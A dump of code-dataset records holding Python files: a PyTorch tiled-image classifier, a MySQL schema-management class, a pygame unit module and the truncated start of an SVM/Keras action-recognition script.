self.given_label = input['label']\n self.indices1 = np.array([i for i in range(self.given_label.size()[0])])\n self.indices2 = self.given_label.numpy()\n self.image_paths = input['path']\n\n def forward(self):\n return\n\n def backward_D(self, allow_background=True):\n predictD = self.netD(self.image)\n softmax = self.softmax(predictD).detach().cpu().numpy()\n given_score = softmax[self.indices1, self.indices2]\n label = torch.LongTensor([self.given_label[i] if given_score[i] >= self.threshold or not allow_background else self.opt.n_class - 1 for i in range(len(self.indices1))]).to(self.device)\n for i in range(len(given_score)):\n if given_score[i] > self.max_D[i]:\n self.max_D[i] = given_score[i]\n self.loss_D = self.criterion(predictD, label)\n self.loss_D.backward()\n\n def backward_G(self, allow_background=True):\n predictG = self.netG(self.image)\n softmax = self.softmax(predictG).detach().cpu().numpy()\n given_score = softmax[self.indices1, self.indices2]\n label = torch.LongTensor([self.given_label[i] if given_score[i] >= self.threshold or not allow_background else self.opt.n_class - 1 for i in range(len(self.indices1))]).to(self.device)\n for i in range(len(given_score)):\n if given_score[i] > self.max_G[i]:\n self.max_G[i] = given_score[i]\n self.loss_G = self.criterion(predictG, label)\n self.loss_G.backward()\n\n def backward_Class(self, allow_background=True):\n predictClass = self.netClassifier(self.image)\n softmax = self.softmax(predictClass).detach().cpu().numpy()\n given_score = softmax[self.indices1, self.indices2]\n label = 
torch.LongTensor([self.given_label[i] if given_score[i] >= self.threshold or not allow_background else self.opt.n_class - 1 for i in range(len(self.indices1))]).to(self.device)\n for i in range(len(given_score)):\n if given_score[i] > self.max_Class[i]:\n self.max_Class[i] = given_score[i]\n self.loss_Class = self.criterion(predictClass, label)\n self.loss_Class.backward()\n\n def optimize_parameters(self, allow_background=True):\n self.max_D = [0] * len(self.indices1)\n self.max_G = [0] * len(self.indices1)\n self.max_Class = [0] * len(self.indices1)\n \n self.cumulative_loss_G = 0\n self.cumulative_loss_D = 0\n self.cumulative_loss_C = 0\n\n interval = self.opt.load_size // 4\n half_interval = interval // 2\n startX = np.random.randint(interval + 2) - half_interval\n startY = np.random.randint(interval + 2) - half_interval\n for i in range(3):\n for j in range(3):\n X = min(startX + interval * (i + 1), self.opt.load_size - interval)\n Y = min(startY + interval * (j + 1), self.opt.load_size - interval)\n self.X_pos = i\n self.Y_pos = j\n self.image = self.full_image[:, :, X:X + interval, Y:Y + interval]\n self.run_optimizers(allow_background)\n self.cumulative_loss_G += self.loss_G.detach()\n self.cumulative_loss_D += self.loss_D.detach()\n self.cumulative_loss_C += self.loss_Class.detach()\n \n for i in range(2):\n for j in range(2):\n X = min(startX + interval * (i + 1), self.opt.load_size - interval)\n Y = min(startY + interval * (j + 1), self.opt.load_size - interval)\n self.X_pos = i + 0.5\n self.Y_pos = j + 0.5\n self.image = self.full_image[:, :, X:X + interval, Y:Y + interval]\n self.run_optimizers(allow_background)\n self.cumulative_loss_G += self.loss_G.detach()\n self.cumulative_loss_D += self.loss_D.detach()\n self.cumulative_loss_C += self.loss_Class.detach()\n\n self.loss_G = self.cumulative_loss_G / 13\n self.loss_D = self.cumulative_loss_D / 13\n self.loss_Class = self.cumulative_loss_C / 13\n\n rerun = False\n for i in range(len(self.max_D)):\n rerun = rerun or self.max_D[i] < self.threshold or self.max_G[i] < self.threshold or self.max_Class[i] < self.threshold\n if rerun and allow_background:\n self.optimize_parameters(False)\n\n def run_optimizers(self, allow_background=True):\n self.optimizer_D.zero_grad()\n self.backward_D(allow_background)\n self.optimizer_D.step()\n self.optimizer_G.zero_grad()\n self.backward_G(allow_background)\n self.optimizer_G.step()\n self.optimizer_netClassifier.zero_grad()\n self.backward_Class(allow_background)\n self.optimizer_netClassifier.step()\n\n def update_epoch_params(self, epoch):\n if epoch > self.opt.n_aggressive:\n self.threshold = min(self.opt.max_threshold, self.opt.threshold_increase * (epoch - self.opt.n_aggressive))\n\n def get_color_for_label(self, labels):\n return [self.colors[label] for label in labels]\n\n def compute_visuals(self, dataset=None):\n if dataset is None:\n return\n self.labelsG = self.full_image.clone()\n self.labelsD = self.full_image.clone()\n self.labelsC = self.full_image.clone()\n\n interval = self.opt.load_size // 4\n half_interval = interval // 2\n cumulative_softmaxG = 0\n cumulative_softmaxD = 0\n cumulative_softmaxC = 0\n for i in range(4):\n for j in range(4):\n X = interval * i\n Y = interval * j\n self.image = self.full_image[:, :, X:X + interval, Y:Y + interval]\n softmaxG = self.softmax(self.netG(self.image)).detach()\n softmaxD = self.softmax(self.netD(self.image)).detach()\n softmaxC = self.softmax(self.netClassifier(self.image))\n predictG = torch.argmax(softmaxG, dim=1).cpu().numpy()\n 
predictD = torch.argmax(softmaxD, dim=1).cpu().numpy()\n predictC = torch.argmax(softmaxC, dim=1).cpu().numpy()\n self.labelsG[:, :, X:X + interval, Y:Y + interval] = torch.FloatTensor(self.get_color_for_label(predictG)).view(-1, 3, 1, 1).repeat(1, 1, interval, interval).to(self.device)\n self.labelsD[:, :, X:X + interval, Y:Y + interval] = torch.FloatTensor(self.get_color_for_label(predictD)).view(-1, 3, 1, 1).repeat(1, 1, interval, interval).to(self.device)\n self.labelsC[:, :, X:X + interval, Y:Y + interval] = torch.FloatTensor(self.get_color_for_label(predictC)).view(-1, 3, 1, 1).repeat(1, 1, interval, interval).to(self.device)\n cumulative_softmaxG += softmaxG.detach()\n cumulative_softmaxD += softmaxD.detach()\n cumulative_softmaxC += softmaxC.detach()\n print(cumulative_softmaxG[0, :])\n print(cumulative_softmaxD[0, :])\n print(cumulative_softmaxC[0, :])\n", "sub_path": "models/classifier128_model.py", "file_name": "classifier128_model.py", "file_ext": "py", "file_size_in_byte": 10642, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "base_model.BaseModel", "line_number": 7, "usage_type": "name"}, {"api_name": "base_model.BaseModel.__init__", "line_number": 20, "usage_type": "call"}, {"api_name": "base_model.BaseModel", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.nn.Softmax", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 44, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 46, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 47, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 115, "usage_type": "attribute"}, {"api_name": "torch.argmax", "line_number": 188, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 190, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 191, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 192, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "572078137", "text": "#!/usr/bin/env python\n\n\nfrom solo.db.schema import DatabaseSchema\nfrom solo.db.exceptions import (\n SchemaNotExistException,\n SchemaExistsException)\n\nimport logging\n\n\nclass MySQLDatabaseSchema(DatabaseSchema):\n\n COMMENT_MAX_TABLE = 60\n COMMENT_MAX_COLUMN = 255\n\n def get_prefix_info(self, table='defalut', add_prefix=True):\n\n 
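`Classifier128Model` above classifies 128-px crops of a 512-px image on a regular grid (plus a jittered grid during training). A minimal sketch of the regular tiling used by `compute_visuals`, assuming the defaults shown (`load_size=512`, 4x4 grid; the helper name is hypothetical):

```python
# Cut a (B, C, load_size, load_size) batch into interval-sized crops on a
# regular n x n grid; each crop is classified independently by the model above.
import torch

def grid_tiles(image, load_size=512, n=4):
    interval = load_size // n
    for i in range(n):
        for j in range(n):
            x, y = i * interval, j * interval
            yield (i, j), image[:, :, x:x + interval, y:y + interval]

batch = torch.zeros(2, 3, 512, 512)
tiles = dict(grid_tiles(batch))
assert tiles[(0, 0)].shape == (2, 3, 128, 128)  # 16 tiles of 128 px each
```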
info = {'prefix': self.connection.table_prefix(table)}\n        if add_prefix:\n            table = info['prefix'] + table\n\n        pos = table.find('.')\n        if pos != -1:\n            info['database'] = table[:pos]\n            info['table'] = table[pos + 1:]\n        else:\n            db_info = Database.get_connection_info()\n            info['database'] = db_info['default']['database']\n            info['table'] = table\n\n        return info\n\n    def build_table_named_condition(self, table_name,\n                                    operator='=', add_prefix=True):\n        info = self.connection.get_connection_options()\n        table_info = self.get_prefix_info(table_name, add_prefix)\n        condition = QueryCondition('AND')\n        condition.condition('table_schema', table_info['database'])\n        condition.condition('table_name', table_info['table'], operator)\n        return condition\n\n    def create_table_sql(self, name, table):\n        info = self.connection.get_connection_options()\n        table.update({'mysql_engine': 'InnoDB', 'mysql_character_set': 'utf8'})\n        sql = 'CREATE TABLE ' + name + ' (\\n'\n        for field_name, field in table['fields'].iteritems():\n            sql += self.create_field_sql(field_name,\n                                         self.process_field(field)) + ', \\n'\n        keys = self.create_keys_sql(table)\n        if keys:\n            sql += ', \\n'.join(keys) + ', \\n'\n        sql = sql[:-3] + '\\n) '\n        sql += ' ENGINE = ' + table['mysql_engine'] + \\\n            ' DEFAULT CHARACTER SET ' + table['mysql_character_set']\n\n        if table.get('description'):\n            sql += ' COMMENT ' + \\\n                self.prepare_comment(\n                    table['description'], self.COMMENT_MAX_TABLE)\n        return [sql]\n\n    def create_field_sql(self, name, spec):\n        sql = '`' + name + '` ' + spec['mysql_type']\n        if spec['mysql_type'] in ['VARCHAR', 'CHAR', 'TINYTEXT',\n                                  'MEDIUMTEXT', 'LONGTEXT', 'TEXT'] and spec.get('length'):\n            sql += '(' + str(spec['length']) + ')'\n        elif spec.get('precision') and spec.get('scale'):\n            sql += '(' + str(spec['precision']) + ', ' + str(spec['scale']) + ')'\n\n        if spec.get('unsigned'):\n            sql += ' unsigned'\n\n        if spec.has_key('not null'):\n            if spec.get('not null'):\n                sql += " NOT NULL"\n            # else:\n            #     sql += ' NULL'\n\n        if spec.get('auto_increment'):\n            sql += ' auto_increment'\n\n        if spec.has_key('default'):\n            if type(spec['default']) is str:\n                if spec['default'] != '':\n                    spec['default'] = "'" + spec['default'] + "'"\n                else:\n                    spec['default'] = "''"\n            elif not spec['default']:\n                spec['default'] = 'NULL'\n            sql += " DEFAULT %s" % (spec['default'])\n        if not spec.has_key('not null') and not spec.has_key('default'):\n            sql += ' DEFAULT NULL'\n\n        if spec.get('description'):\n            sql += " COMMENT " + \\\n                self.prepare_comment(\n                    spec['description'], self.COMMENT_MAX_COLUMN)\n        logging.debug('field sql : %s' % (sql))\n        return sql\n\n    def process_field(self, field):\n        if not field.get('size'):\n            field['size'] = 'normal'\n        if field.get('mysql_type'):\n            field['mysql_type'] = field['mysql_type'].upper()\n        else:\n            _map = self.get_field_type_map()\n            field['mysql_type'] = _map[field['type'] + ':' + field['size']]\n        if field.get('type') == 'serial':\n            field['auto_increment'] = True\n\n        return field\n\n    def get_field_type_map(self):\n        return {\n            'varchar:normal': 'VARCHAR',\n            'char:normal': 'CHAR',\n\n            'text:tiny': 'TINYTEXT',\n            'text:small': 'TINYTEXT',\n            'text:medium': 'MEDIUMTEXT',\n            'text:big': 'LONGTEXT',\n            'text:normal': 'TEXT',\n\n            'serial:tiny': 'TINYINT',\n            'serial:small': 'SMALLINT',\n            'serial:medium': 'MEDIUMINT',\n            'serial:big': 'BIGINT',\n            'serial:normal': 'INT',\n\n            'int:tiny': 'TINYINT',\n            'int:small': 'SMALLINT',\n            'int:medium': 'MEDIUMINT',\n            'int:big': 'BIGINT',\n            'int:normal': 'INT',\n\n            'float:tiny': 'FLOAT',\n            'float:small': 'FLOAT',\n
'float:medium': 'FLOAT',\n            'float:big': 'DOUBLE',\n            'float:normal': 'FLOAT',\n\n            'numeric:normal': 'DECIMAL',\n\n            'blob:big': 'LONGBLOB',\n            'blob:normal': 'BLOB',\n        }\n\n    def create_keys_sql(self, spec):\n        keys = []\n        if spec.get('primary key'):\n            keys.append(\n                'PRIMARY KEY (' + self.create_keys_sql_helper(spec['primary key']) + ')')\n\n        if spec.get('unique keys'):\n            for k, fields in spec.get('unique keys').iteritems():\n                keys.append('UNIQUE KEY `' + k +\n                            '` (' + self.create_keys_sql_helper(fields) + ')')\n\n        if spec.get('indexes'):\n            for index, fields in spec.get('indexes').iteritems():\n                keys.append('INDEX `' + index +\n                            '` (' + self.create_keys_sql_helper(fields) + ')')\n        return keys\n\n    def create_key_sql(self, fields):\n        result = []\n        for field in fields:\n            if type(field) is list:\n                result.append('`' + field[0] + '`(' + str(field[1]) + ')')\n            else:\n                result.append('`' + field + '`')\n        return ', '.join(result)\n\n    create_keys_sql_helper = create_key_sql\n\n    def rename_table(self, table, new_name):\n        if not self.table_exists(table):\n            raise SchemaNotExistException(\n                "Cannot rename %s to %s: table %s doesn't exist." % (table, new_name, table))\n\n        if self.table_exists(new_name):\n            raise SchemaExistsException(\n                "Cannot rename %s to %s: table %s already exists." % (table, new_name, new_name))\n\n        info = self.get_prefix_info(new_name)\n        return self.connection.query('ALTER TABLE ' + table + ' RENAME TO `' + info['table'] + '`')\n\n    def drop_table(self, table):\n        if not self.table_exists(table):\n            return False\n        self.connection.query('DROP TABLE ' + table)\n        return True\n\n    def add_field(self, table, field, spec={}, keys_new={}):\n        if not self.table_exists(table):\n            raise SchemaNotExistException(\n                "Cannot add field %s.%s: table doesn't exist." % (table, field))\n\n        if self.field_exists(table, field):\n            raise SchemaExistsException(\n                "Cannot add field %s.%s: field already exists." % (table, field))\n\n        fixnull = False\n        if spec.get('not null') and not spec.get('default'):\n            fixnull = True\n            spec['not null'] = False\n        query = 'ALTER TABLE ' + table + ' ADD '\n        query += self.create_field_sql(field, self.process_field(spec))\n        keys_sql = self.create_keys_sql(keys_new)\n        if keys_sql:\n            query += ', ADD ' + ', ADD '.join(keys_sql)\n        res = self.connection.query(query)\n        if spec.get('initial'):\n            res = self.connection.update(table).fields(\n                fields=spec['initial']).execute()\n\n        if fixnull:\n            spec['not null'] = True\n            res = self.change_field(table, field, field, spec)\n        return bool(res)\n\n    def drop_field(self, table, field):\n        if not self.field_exists(table, field):\n            return False\n\n        self.connection.query('ALTER TABLE `' + table + '` DROP `' + field + '`')\n        return True\n\n    def field_set_default(self, table, field, default):\n        if not self.field_exists(table, field):\n            raise SchemaNotExistException(\n                "Cannot set default value of field %s.%s: field doesn't exist." % (table, field))\n        if not default:\n            default = 'NULL'\n\n        self.connection.query('ALTER TABLE ' + table +\n                              ' ALTER COLUMN `' + field + '` SET DEFAULT ' + str(default))\n\n    def field_set_no_default(self, table, field):\n        if not self.field_exists(table, field):\n            raise SchemaNotExistException(\n                "Cannot remove default value of field %s.%s: field doesn't exist." % (table, field))\n        self.connection.query('ALTER TABLE ' + table +\n                              ' ALTER COLUMN `' + field + '` DROP DEFAULT')\n\n    def index_exists(self, table, name):\n        row = self.connection.query(\n            'SHOW INDEX FROM ' + table + " WHERE key_name = '%s'" % (name)).fetch_assoc()\n        return
bool(row.get('key_name'))\n\n    def add_primary_key(self, table, fields):\n        if not self.table_exists(table):\n            raise SchemaNotExistException(\n                "Cannot add primary key to table %s: table doesn't exist." % (table))\n\n        if self.index_exists(table, 'PRIMARY'):\n            raise SchemaExistsException(\n                "Cannot add primary key to table %s: primary key already exists." % (table))\n\n        self.connection.query('ALTER TABLE ' + table +\n                              ' ADD PRIMARY KEY (' + self.create_key_sql(fields) + ')')\n\n    def drop_primary_key(self, table):\n        if not self.index_exists(table, 'PRIMARY'):\n            return False\n        self.connection.query('ALTER TABLE ' + table + ' DROP PRIMARY KEY')\n        return True\n\n    def add_unique_key(self, table, name, fields):\n        if not self.table_exists(table):\n            raise SchemaNotExistException(\n                "Cannot add unique key %s to table %s: table doesn't exist." % (name, table))\n\n        if self.index_exists(table, name):\n            raise SchemaExistsException(\n                "Cannot add unique key %s to table %s: unique key already exists." % (name, table))\n\n        self.connection.query('ALTER TABLE ' + table + ' ADD UNIQUE KEY `' +\n                              name + '` (' + self.create_key_sql(fields) + ')')\n\n    def drop_unique_key(self, table, name):\n        if not self.index_exists(table, name):\n            return False\n        self.connection.query(\n            'ALTER TABLE ' + table + ' DROP KEY `' + name + '`')\n        return True\n\n    def add_index(self, table, name, fields):\n        if not self.table_exists(table):\n            raise SchemaNotExistException(\n                "Cannot add index %s to table %s: table doesn't exist." % (name, table))\n\n        if self.index_exists(table, name):\n            raise SchemaExistsException(\n                "Cannot add index %s to table %s: index already exists." % (name, table))\n        self.connection.query('ALTER TABLE ' + table + ' ADD INDEX `' +\n                              name + '` (' + self.create_key_sql(fields) + ')')\n\n    def drop_index(self, table, name):\n        if not self.index_exists(table, name):\n            return False\n        self.connection.query(\n            'ALTER TABLE ' + table + ' DROP INDEX `' + name + '`')\n        return True\n\n    def change_field(self, table, field, field_new, spec, keys_new={}):\n        if not self.field_exists(table, field):\n            raise SchemaNotExistException(\n                "Cannot change the definition of field %s.%s: field doesn't exist." % (table, field))\n\n        if field != field_new and self.field_exists(table, field_new):\n            raise SchemaExistsException(\n                "Cannot rename field %s.%s to %s: target field already exists." % (table, field, field_new))\n\n        sql = 'ALTER TABLE ' + table + ' CHANGE `' + field + '` ' + \\\n            self.create_field_sql(field_new, self.process_field(spec))\n        keys_sql = self.create_keys_sql(keys_new)\n        if keys_sql:\n            sql += ', ADD ' + ', ADD '.join(keys_sql)\n        self.connection.query(sql)\n        return True\n\n    def prepare_comment(self, comment, length=None):\n        comment = comment.replace("'", ',')\n        if length:\n            comment = truncate_utf8(\n                self.connection.prefix_tables(comment), length, True, True)\n        return "'%s'" % self.connection.quote(comment)\n\n    def get_comment(self, table, column=None):\n        condition = self.build_table_named_condition(table)\n        if column:\n            condition.condition('column_name', column)\n            condition.compile(self.connection, self)\n            return self.connection.query("SELECT column_comment FROM information_schema.columns WHERE " +\n                                         condition.to_sql(), condition.arguments()).fetch_field()\n        condition.compile(self.connection, self)\n        comment = self.connection.query("SELECT table_comment FROM information_schema.tables WHERE " +\n                                        condition.to_sql(), condition.arguments()).fetch_field()\n        import re\n        return
re.sub(r'; InnoDB free:.*$', r'', comment)\n\n    def table_exists(self, table):\n        try:\n            self.connection.query_range('SELECT 1 FROM ' + table, 1, 0)\n            return True\n        except:\n            return False\n\n    def field_exists(self, table, column):\n        try:\n            logging.debug('field exists check...')\n            self.connection.query_range('SELECT %s FROM ' %\n                                        (column) + table, 1, 0)\n            return True\n        except:\n            return False\n", "sub_path": "solo/db/mysql/schema.py", "file_name": "schema.py", "file_ext": "py", "file_size_in_byte": 13853, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "solo.db.schema.DatabaseSchema", "line_number": 12, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 99, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 180, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaExistsException", "line_number": 184, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 198, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaExistsException", "line_number": 202, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 233, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 243, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 255, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaExistsException", "line_number": 259, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 273, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaExistsException", "line_number": 277, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 292, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaExistsException", "line_number": 296, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaNotExistException", "line_number": 310, "usage_type": "call"}, {"api_name": "solo.db.exceptions.SchemaExistsException", "line_number": 314, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 343, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 354, "usage_type": "call"}]} {"seq_id": "584138580", "text": "import pygame\r\nimport os\r\nfrom screen import *\r\n\r\nBOARD_S = 30\r\n\r\npygame.init()\r\ntime = pygame.time.Clock()\r\n\r\nunit_sprites = pygame.sprite.Group()\r\nsprite = pygame.sprite.Sprite()\r\n\r\n\r\ndef win(winer):\r\n    screen.fill((0, 0, 0))\r\n\r\n\r\ndef load_image(name, color_key=None):\r\n    fullname = os.path.join('data', name)\r\n    try:\r\n        image = pygame.image.load(fullname).convert()\r\n        if color_key is not None:\r\n            if color_key == -1:\r\n                color_key = image.get_at((0, 0))\r\n            image.set_colorkey(color_key)\r\n        else:\r\n            image = image.convert_alpha()\r\n        return image\r\n    except pygame.error as message:\r\n        print('Cannot load image:', name)\r\n        raise SystemExit(message)\r\n\r\n\r\nclass MainUnit:\r\n    def __init__(self, screen):\r\n        self.name = \"\"\r\n        self.atk = 0\r\n        self.move = 0\r\n        self.coord = [1, 1]\r\n        self.x, self.y = self.coord[0] * BOARD_S + 10, self.coord[1] * BOARD_S + 10\r\n        self.type = -1\r\n        self.atk_range = 0\r\n        self.health = 1\r\n        self.max_health = 1\r\n        self.screen = screen\r\n\r\n    def move(self, coord):\r\n        pass\r\n\r\n    def get_damage(self, damage):\r\n        self.health -= damage\r\n        if self.health <= 0:\r\n
self.dead()\r\n\r\n def put_damage(self, coord):\r\n pass\r\n\r\n def render(self, coord):\r\n pass\r\n\r\n def dead(self):\r\n print(self.x, self.y)\r\n pygame.draw.rect(self.screen, (150, 190, 16), (self.x, self.y, 30, 30))\r\n pygame.display.flip()\r\n print(\"DEAD\")\r\n\r\n\r\nclass WallMg(pygame.sprite.Sprite):\r\n def __init__(self, group, parent):\r\n super().__init__(group)\r\n self.image = parent.image\r\n self.rect = self.image.get_rect()\r\n\r\n\r\nclass Wall(MainUnit):\r\n def __init__(self, coord, screen):\r\n super().__init__(screen)\r\n self.all_sprites = pygame.sprite.Group()\r\n self.name = \"wall\"\r\n self.coord = coord\r\n self.image = load_image(self.name + \".png\")\r\n\r\n def render(self, **kwargs):\r\n # sprite = pygame.sprite.Sprite()\r\n m_wall = WallMg(self.all_sprites, self)\r\n m_wall.rect.x = self.coord[0]\r\n m_wall.rect.y = self.coord[1]\r\n\r\n\r\nclass CastleMgBlue(pygame.sprite.Sprite):\r\n def __init__(self, group, parent):\r\n super().__init__(group)\r\n self.image = parent.image\r\n self.rect = self.image.get_rect()\r\n\r\n\r\nclass CastleBlue(MainUnit):\r\n def __init__(self, coord, screen):\r\n super().__init__(screen)\r\n self.all_sprites = pygame.sprite.Group()\r\n self.name = \"blue_castle\"\r\n self.coord = coord\r\n #\r\n self.health = 15\r\n #\r\n self.max_health = 15\r\n self.image = load_image(self.name + \".png\")\r\n\r\n def render(self, **kwargs):\r\n m_castle = CastleMgBlue(self.all_sprites, self)\r\n m_castle.rect.x = self.coord[0] + 1\r\n m_castle.rect.y = self.coord[1] + 1\r\n\r\n def dead(self):\r\n self.x, self.y = self.coord[0], self.coord[1]\r\n print(self.x, self.y)\r\n pygame.draw.rect(self.screen, (150, 190, 16), (self.x, self.y, 30, 30))\r\n pygame.display.flip()\r\n print(\"DEAD\")\r\n win(\"Red\")\r\n\r\n\r\nclass CastleMgRed(pygame.sprite.Sprite):\r\n def __init__(self, group, parent):\r\n super().__init__(group)\r\n self.image = parent.image\r\n self.rect = self.image.get_rect()\r\n\r\n\r\nclass CastleRed(MainUnit):\r\n def __init__(self, coord, screen):\r\n super().__init__(screen)\r\n self.all_sprites = pygame.sprite.Group()\r\n self.name = \"red_castle\"\r\n self.coord = coord\r\n #\r\n self.health = 15\r\n #\r\n self.max_health = 15\r\n self.image = load_image(self.name + \".png\")\r\n\r\n def render(self, **kwargs):\r\n m_castle = CastleMgRed(self.all_sprites, self)\r\n m_castle.rect.x = self.coord[0] + 1\r\n m_castle.rect.y = self.coord[1] + 1\r\n\r\n def dead(self):\r\n self.x, self.y = self.coord[0], self.coord[1]\r\n pygame.draw.rect(self.screen, (150, 190, 16), (self.x, self.y, 30, 30))\r\n pygame.display.flip()\r\n print(\"DEAD\")\r\n win(\"Blue\")\r\n", "sub_path": "unit.py", "file_name": "unit.py", "file_ext": "py", "file_size_in_byte": 4176, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pygame.init", "line_number": 7, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 11, "usage_type": "attribute"}, {"api_name": "screen.fill", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, 
{"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.error", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 68, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 118, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Group", "line_number": 133, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 133, "usage_type": "attribute"}, {"api_name": "pygame.draw.rect", "line_number": 149, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 149, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 150, "usage_type": "attribute"}]} +{"seq_id": "5362513", "text": "from __future__ import print_function\nfrom sklearn.svm import SVC\nfrom sklearn import preprocessing\nimport keras\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\nfrom keras.optimizers import RMSprop\nimport numpy as np\nimport argparse, os\nfrom keras import regularizers\nfrom scipy.stats import mode\nimport logging, time\n\nparser = argparse.ArgumentParser(description='Generate feature map from joints')\nparser.add_argument('--dataset', type=str, default='HMDB51')\nparser.add_argument('--split', type=int, default=1)\nargs = parser.parse_args()\nroot = \"D:/graduation_project/workspace/dataset/\"\ntrain = 'train'+str(args.split)\ntest = 'test'+str(args.split)\n\nlayer = 'block5_pool'\ntrain_spatial_root = root + args.dataset + '_train_test_splits/' + train + '_spatial/'+layer+'/ten1/_1x512/'\ntest_spatial_root = root + args.dataset + '_train_test_splits/' + test + '_spatial/'+layer+'/ten1/_1x512/'\n\nbatch_size = 256\nnum_classes = 51\nepochs = 30\nlevel1 = 512\nlevel2 = 512\nkjud = False\nbjud = False\nwrite_csv = False\n\ndef svc(traindata,trainlabel,testdata,testlabel):\n # beginTime = time.time()\n # min_max_scaler = preprocessing.MinMaxScaler()\n # traindata = min_max_scaler.fit_transform(traindata)\n # testdata = min_max_scaler.transform(testdata)\n # print(\"transform data:\", time.time() - beginTime)\n\n print(\"Start training SVM...\")\n beginTime = time.time()\n svcClf = SVC(C=1,kernel=\"linear\",cache_size=3000, max_iter=500, tol=1)\n svcClf.fit(traindata,trainlabel)\n print(\"SVM training 
